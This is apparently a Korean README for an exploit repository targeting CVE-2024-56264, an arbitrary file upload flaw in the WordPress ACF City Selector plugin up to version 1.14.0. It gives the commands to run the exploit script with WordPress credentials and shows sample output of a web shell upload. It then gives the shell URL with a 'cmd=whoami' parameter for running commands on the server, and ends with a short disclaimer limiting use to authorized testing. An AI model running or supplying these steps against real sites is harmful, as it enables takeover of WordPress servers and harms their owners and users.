
WordPress ACF City Selector 플러그인 <= 1.14.0 - 임의 파일 업로드 취약점
이 저장소는 CVE-2024-56264에 대한 익스플로잇을 포함합니다. 이는 WordPress ACF City Selector 플러그인(버전 <= 1.14.0)에서 발견된 임의 파일 업로드 취약점입니다. 이 취약점으로 인해 공격자는 취약한 WordPress 인스턴스에 **악성 PHP 파일(웹 셸)**을 업로드하고 서버에서 임의 명령을 실행할 수 있습니다.
<= 1.14.0ACF City Selector 플러그인은 업로드된 파일을 제대로 검증하지 않아 공격자가 제한을 우회하고 임의의 PHP 파일을 업로드할 수 있습니다. 악성 PHP 파일이 업로드되면 공격자는 시스템 명령을 원격으로 실행하여 서버 전체를 장악할 수 있습니다.
스크립트를 실행하기 전에 다음이 설치되어 있는지 확인하세요:
requests 모듈 (pip install requests로 설치)다음 명령으로 필요한 모든 종속성을 설치할 수 있습니다:
pip install -r requirements.txt
익스플로잇 실행:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
익스플로잇에 성공하면 다음과 같은 출력이 표시됩니다:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
성공하면 다음 URL로 업로드된 셸에 접근합니다:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
이를 통해 서버에서 원격 명령 실행이 가능합니다.
이 스크립트는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 무단 사용은 불법이며 심각한 결과를 초래할 수 있습니다. 저자는 이 익스플로잇의 어떠한 오용에 대해서도 책임을 지지 않습니다.